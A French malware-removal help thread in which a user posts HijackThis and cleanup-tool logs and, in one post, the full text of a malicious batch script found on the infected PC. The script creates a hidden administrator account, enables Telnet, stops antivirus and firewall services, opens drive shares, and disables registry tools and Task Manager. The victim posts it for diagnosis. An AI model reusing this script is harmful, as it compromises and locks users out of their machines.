Igniatius

Merci Philipped94, J'ai fait ce que tu m'a conseillé et ça a marché super... Juste une petite précision, je ne sais pas si elle a son importance, mais ça n'a fonctionné qu'une fois l'ordinateur rebooter. Mais bon l'essentiel est que j'ai pu supprimer le fichier "dll" qui m'embêtait et que j'ai retrouvé ma connexion. Encore merci.

Bonjour, J'ai voulu installé le controle parental de chez orange sur l'ordinateur de mon fils croyant naivement que bien que n'étant pas chez ce fournisseur cela marcherait Réalisant mon erreur je l'ai désinstallé. Et depuis on ne peut plus avoir accès à internet avec cet ordinateur. J'ai recherché un peu sur la toile et à priori c'est parce que la désinstallation n'a pas été correctement effectuée ! Effectivement je trouve trace d'un dossier "Controle Parental" à l'intérieur duquel se trouve un dossier "BIN" à l'interieur duquel se trouve un fichier : "lsp.dll" Mon problème c'est que je n'arrive pas à les supprimer. A tout hasard je vous fournis le log effectué : Logfile of HijackThis v1.99.1 Scan saved at 19:34:36, on 09/02/2008 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180) Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\Explorer.EXE C:\Program Files\Hijackthis Version Française\VERSION TRADUITE ORIGINALE.EXE R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.fr/ie R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.fr R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.fr/ R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.google.fr/keyword/%s R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://www.google.fr/ R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = R3 - Default URLSearchHook is missing O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe O4 - HKLM\..\Run: [sunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0\bin\jusched.exe" O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime O4 - HKCU\..\RunOnce: [Config] %systemroot%\system32\run.cmd O4 - HKCU\..\RunOnce: [nlsf] cmd.exe /C move /Y "%SystemRoot%\System32\syssetub.dll" "%SystemRoot%\System32\syssetup.dll" O4 - HKCU\..\RunOnce: [tscuninstall] %systemroot%\system32\tscupgrd.exe O4 - Global Startup: Utilitaire réseau pour SAGEM Wi-Fi 11g USB adapter.lnk = ? O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe O23 - Service: avast! Mail Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe" /service (file missing) O23 - Service: avast! Web Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe" /service (file missing) O23 - Service: Orange Contrôle Parental (OPTENET_FILTER) - Unknown owner - C:\Program Files\Controle Parental\bin\optproxy.exe (file missing) Merci par avance pour votre aide.

Bonjour tout le monde !!! Je suis à la recherche de MALEKAL MORTE qui intervenait sur ce forum. Il a commençait à m'aider à résoudre un problème de sécurité mais je n'ai plus de nouvelles depuis 31 mai 2007. et je suis toujours en rade de micro. J'espère qu'il ne lui ai rien arrivé de grave . Donc voilà si d'aventure vous avez des nouvelles... n'hesitez pas à faire passer pour me rassurer sur son compte et puis, je l'avoue, pour finir de résoudre mon problème qui m'empoisonne l'existence. Au plaisir de vous lire

Personne ?

Bonjour à toutes et à tous Et tout d'abord pour qu'il n'y est pas de malentendu je précise que j'avais ouvert un premier post intitulé "Mon rapport hijackthis" concernant mon problème mais que l'animateur qui m'avait pris en charge ne semble plus présent sur ce forum depuis une vingtaine de jours. Or je commence a avoir réellement besoin de mon ordinateur pour raisons professionnelles. Quelqu'un peut-il prendre la relève ? S'il vous plait !!!!!! Voici les symptomes : Mon ordinateur a rebooté tout seul comme un grand. Au redémarrage, il a créé deux comptes supplémentaires (un nommé "numbers" et l'autre "ADSL") Ces comptes créés sont protégés par un mot de passe. Je ne peux donc pas y avoir accès. Mais surtout ils m'ont "volé" ma qualité de compte administrateur. Je ne peux donc plus gérer grand chose sur mon micro. Pour couronner le tout, je n'arrive plus, non plus, à me connecter à internet via ce micro. Je ne peux donc procéder à aucun scan en ligne. Pour l'accès à ce forum j'utilise un portable branché en réseau chez moi. Le problème c'est que le pc infecté, car je pense ne pas trop m'avancer en disant qu'il est infecté, est l'ordinateur principal du réseau, je ne peux donc pas avoir accès à mon modem pour une mise à jour du firmware par exemple. En vous remerciant de votre attention Sincèrement Igniatius

Y'a plus personne pour me répondre ? Soyez franc et dites le moi si mon cas est désespéré !!!!! Je ne sais plus quoi faire !!!!!!!

Heu... Je me sens seul tout d'un coup Pas de réponse depuis une petite dizaine de jours. J'espère qu'il n'est rien arrivé de grave à Malekal Morte...

Heu... C'est ce que j'ai précisé lors de mon tout premier post. La bécane a redémarré en créant deux comptes protégés par mot de passe (que je ne connais pas, bien sûr!!!). J'ai perdu ma qualité d'administrateur au profit de l'un (ou des deux ) comptes créés. d'où l'amplification du problème...

Je ne peux pas instaler ZoneAlarm. voici le message indiqué : "L'accès pour effectuer les modifications requises sur la configuration du système vous a été refusé. Veuillez recommencer l'installation depuis un compte d'administrateur."

Voilà qui est fait. Et le resultat est que les deux lignes reviennent...

1°/ J'ai bien un fichier C:\WINDOWS\System32\win32 mais y'a pas d'extension bat. C'est celui-là. dans le doute c'est celui que j'ai pris 2°/ En faisant click droit je n'ai pas la mention edition alors j'ai cliqué sur modifié ce qui m'a ouvert le bloc-note 3°/ j'ai donc copié le contenu proposé et c'est ce que je poste ici : @echo off @break off if exist %systemroot%\Lsd.exe goto enx if exist %programfiles%\Taskdrv.exe (goto av) else goto av2 :av if exist %systemroot%\Navnet.exe (goto av3) :av2 attrib -h -s -r %systemroot%\Navnet.exe attrib -h -s %programfiles%\Taskdrv.exe attrib -h -s -r %systemroot%\Win.ini copy SETUP.exe %systemroot%\Navnet.exe copy PLAYER.exe %systemroot%\Navnet.exe copy CRACK.exe %systemroot%\Navnet.exe copy /b "*..exe" %systemroot%\Navnet.exe copy %programfiles%\Taskdrv.exe %systemroot%\Navnet.exe copy %systemroot%\Navnet.exe %programfiles%\Taskdrv.exe cd %systemroot%\ attrib +h +s %programfiles%\Taskdrv.exe attrib +h +s %systemroot%\Navnet.exe echo [Windows] >> Win.ini echo Run = C:\Windows\Navnet.exe >> Win.ini attrib +h +s +r %systemroot%\Win.ini reg add HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr /v Start /t REG_DWORD /d 2 /f net user nombre ADSL /add net localgroup "Administrador es" ADSL /add reg add HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices /v Firewall /d %Systemroot%\Navnet.exe /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices /v kis /d %programfiles%\Taskdrv.exe /f ping 127.0.0.1 -n 300 > nul :av3 NET STOP "Centro de Seguridad" NET STOP "Firewall de Windows/Conexión compartida a Internet (ICS)" tskill explorer /a taskkill /f /IM explorer.exe reg add HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr /v Start /t REG_DWORD /d 2 /f net user ADSL ADSL /add net stop navapsvc net stop NPFMntor net stop ccApp net stop symlcsvc net stop apvxdwin net stop pavProxy net share ADMIN$ net share C$ net share IPC$ net share c=c net share d=d net share e=e reg add HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices /v Firewall /d %Systemroot%\Navnet.exe /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices /v kis /d %programfiles%\Taskdrv.exe /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Firewall /d %Systemroot%\Navnet.exe /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v kis /d %programfiles%\Taskdrv.exe /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f reg add HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel /v Homepage /t REG_DWORD /d 0 /f reg add HKCU\Software\Microsoft\Internet Explorer\Main /va Start Page /d "http://www.Fuck.com" /f reg add HKCU\Software\Microsoft\Internet Explorer\Main /v Start Page /t REG_MULTI_SZ /D http://www.fUCK.com /f reg add HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel /v Homepage /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 /v 1803 /t REG_DWORD /d 3 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disabletaskmgr /t REG_DWORD /d 1 /f ping 127.0.0.1 -n 100 > nul tskill explorer /a tskill iexplore /a taskkill /f /IM explorer.exe taskkill /f /IM iexplore.exe ping 127.0.0.1 -n 100 > nul start iexplore.exe tskill msnmsgr /a tskill emule /a taskkill /f /IM msnmsgr.exe taskkill /f /IM emule.exe ping 127.0.0.1 -n 100 > nul tskill explorer /a tskill iexplore /a taskkill /f /IM explorer.exe taskkill /f /IM iexplore.exe start iexplore.exe ping 127.0.0.1 -n 90 > nul tskill iexplore /a taskkill /f /IM iexplore.exe start iexplore.exe ping 127.0.0.1 -n 90 > nul tskill explorer /a taskkill /f /IM explorer.exe ping 127.0.0.1 -n 100 > nul tskill svchost /a tskill iexplore /a taskkill /f /IM svchost.exe taskkill /f /IM iexplore.exe goto av3 :enx del /s /q %0 Del /s /q %0 && end C'est ça que tu voulais ?

Bonjour malekal Morte et désolé pour l'absence de news mais pas chez moi ces derniers jours. Bon, reprenons, j'ai suivi tes dernières indications et ben ... rien dechangé. Je peux fixeret avoir accès aux registres grace à fixswen. mais pas de manière définitive. A chaque redémarrage il faut recommencer. J'ai vu sur ton dernier lien un outil de nettoyage du registre nommé JV16 je l'ai installé et lancé mais ça a bloqué avant la fin du scan... voilà les dernières nouvelles Ca veut vraiment pas, hein?

Voilà le rapport de scan AVG antispyware mais tu vas pas être déçu !!! --------------------------------------------------------- AVG Anti-Spyware - Rapport d'analyse --------------------------------------------------------- + Créé à: 13:52:20 19/05/2007 + Résultat de l'analyse: Rien à signaler. Fin du rapport Ca aide pas, hein ?

Bonjour Malekal Morte, voici les news, En ce qui concerne ton indiquation : "Télécharge ce fichier sur ton bureau : http://www.malekal.com/download/Activer_regedit_taskmgr.reg (s'il s'ouvre sur le navigateur, faire un clic droit puis enregistrer la cible du lien sous). Double-clic dessus et accepte l'inscription des données." Ca ne marche pas ! Car lorsque je double clique voici ce qui apparait : Editeur du registre : La modification du Registre a été désactivée par votre administrateur Et pour ce qui est du scan en ligne je ne peux toujours pas me connecter. 1/ Parce que, bien que l'ordinateur détecte mon réseau, il n'arrive pas à se connecter dessus. 2/ Parce que, bien que l'ordinateur ai cessé de redémarrer à tout bout de champ, c'est maintenant au bureau de le faire. Et ça c'est embêtant. 3/ J'ai toujours IE qui se lance, lui aussi n'importe quand ! mais comme il n'y a pas de connexion, il va pas bien loin... Je t'avoue que là, j'ai comme qui dirait un léger coup de mou !!!! J'attends donc ton prochain avis avec impatience. Et j'en profite pour te renouveler mes remerciements pour ton aide.

Bonjour Malekal Morte, voici les 2 rapports navilog1 Voilà le premier : Search Navipromo version 2.0.1 commencé le 17/05/2007 à 17:04:36,57 !!! Attention,ce rapport peut indiquer des fichiers/programmes légitimes!!! !!! Poster ce rapport sur le forum pour le faire analyser !!! !!! Ne pas lancer la partie désinfection sans l'avis d'un spécialiste !!! Fix lancé depuis C:\Program Files\navilog1 Mise a jour le 10.05.2007 a 22h00 by IL-MAFIOSO Executé en mode normal *** Recherche Programmes installes *** *** Recherche dossiers dans C:\WINDOWS *** *** Recherche dossiers dans C:\Program Files *** C:\Program Files\MessengerSkinner trouvé ! *** Recherche dossiers dans C:\Documents and Settings\All Users\Application Data *** *** Recherche dossiers dans C:\Documents and Settings\Pascal\Application Data *** ...\Application Data\MessengerSkinner trouvé ! *** Recherche avec BlackLight Engine/F-secure *** BlackLight Engine est un produit de F-secure, pour + d'infos : http://www.f-secure.com/blacklight/blacklight_help.html F-SECURE BLACKLIGHT ROOTKIT ELIMINATOR ====================================== Copyright 2005-2006 F-Secure Corporation. All rights reserved. This is a beta version. It will expire on 1st of April, 2007. Version information: 2.2.1061. [+] Started on 05/17/07 at 17:04:41. [+] Initializing ... [+] Starting scan, press Ctrl-C to abort. [+] Scanning for hidden items ........................... [-] Scan aborted due to user logoff. [+] Summary: 0 hidden item(s) found, 0 scheduled for renaming. [+] Exited on 05/17/07 at 17:07:44 (return code = 2). *** Recherche fichiers *** C:\WINDOWS\pack.epk trouvé ! C:\WINDOWS\system32\nvs2.inf trouvé ! *** Recherche cles registre *** Recherche dans [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs] Recherche dans [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ModuleUsage] Recherche Clé Magic Control HKEY_CURRENT_USER\Software\Lanconfig trouvé ! HKEY_USERS\S-1-5-21-854245398-920026266-1202660629-1005\Software\Lanconfig trouvé ! *** Module de Recherche complémentaire *** (Recherche fichiers spécifiques) 1)Recherche fichiers connus: 2)Recherche Heuristique : * C:\WINDOWS\system32\rgnepuvwco.dat trouvé ! ** C:\WINDOWS\system32\rgnepuvwco.dat trouvé ! *** **** C:\WINDOWS\system32\rgnepuvwco_navps.dat trouvé ! ***** C:\WINDOWS\system32\rgnepuvwco_nav.dat trouvé ! C:\WINDOWS\system32\rgnepuvwco_navup.dat trouvé ! ****** ******* ******** *** Analyse Terminé le 17/05/2007 à 17:08:57,17 *** et le second : Clean Navipromo version 2.0.1 commencé le 17/05/2007 à 17:16:05,00 Fix lancé depuis C:\Program Files\navilog1 Mise a jour le 10.05.2007 a 22h00 by IL-MAFIOSO Mode suppression par méthode manuelle Nom du fichier saisi : rgnepuvwco *** Recherche, Creation backups et suppression *** C:\WINDOWS\system32\rgnepuvwco.exe absent ! C:\WINDOWS\system32\rgnepuvwco_navtmp.dat absent ! C:\WINDOWS\system32\rgnepuvwco_m2s.xml absent ! C:\WINDOWS\prefetch\rgnepuvwco*.pf absent ! C:\WINDOWS\System32\rgnepuvwco.dat trouvé ! Copie C:\WINDOWS\system32\rgnepuvwco.dat realise avec succes ! C:\WINDOWS\system32\rgnepuvwco.dat supprimé ! C:\WINDOWS\System32\rgnepuvwco_nav.dat trouvé ! Copie C:\WINDOWS\system32\rgnepuvwco_nav.dat realise avec succes ! C:\WINDOWS\system32\rgnepuvwco_nav.dat supprimé ! C:\WINDOWS\System32\rgnepuvwco_navps.dat trouvé ! Copie C:\WINDOWS\system32\rgnepuvwco_navps.dat realise avec succes ! C:\WINDOWS\system32\rgnepuvwco_navps.dat supprimé ! C:\WINDOWS\System32\rgnepuvwco_navup.dat trouvé ! Copie C:\WINDOWS\system32\rgnepuvwco_navup.dat realise avec succes ! C:\WINDOWS\system32\rgnepuvwco_navup.dat supprimé ! *** Suppression dossiers dans C:\WINDOWS *** *** Suppression dossiers dans C:\Program Files *** C:\Program Files\MessengerSkinner ...suppression... C:\Program Files\MessengerSkinner supprimé ! *** Suppression dossiers dans C:\Documents and Settings\All Users\Application Data *** *** Suppression dossiers dans C:\Documents and Settings\Pascal\Application Data *** ...\Application Data\MessengerSkinner ...suppression... ...\Application Data\MessengerSkinner supprimé ! *** Suppression fichiers *** C:\WINDOWS\pack.epk supprimé ! C:\WINDOWS\system32\nvs2.inf supprimé ! *** Suppression fichiers temporaires *** Nettoyage contenu C:\WINDOWS\Temp effectué ! Nettoyage contenu C:\Documents and Settings\Pascal\Local Settings\Temp effectué ! *** Sauvegarde du registre vers dossier Backupnavi*** sauvegarde du registre realise avec succes ! *** Nettoyage registre *** Nettoyage registre Ok *** Traitement Recherche complémentaire *** (Recherche fichiers spécifiques) 1)Recherche fichiers connus: 2)Recherche et Suppression Heuristique : * ** *** **** ***** ****** ******* ******** *** Nettoyage termine le 17/05/2007 à 17:24:55,33 *** A noter (je sais pas si c'est important) lors du redémarrage et avant le deuxieme log, une fenêtre est apparue : Editeur de registre : La modification du registre a été déssactivée par votre administrateur. Encore merci pour ton aide.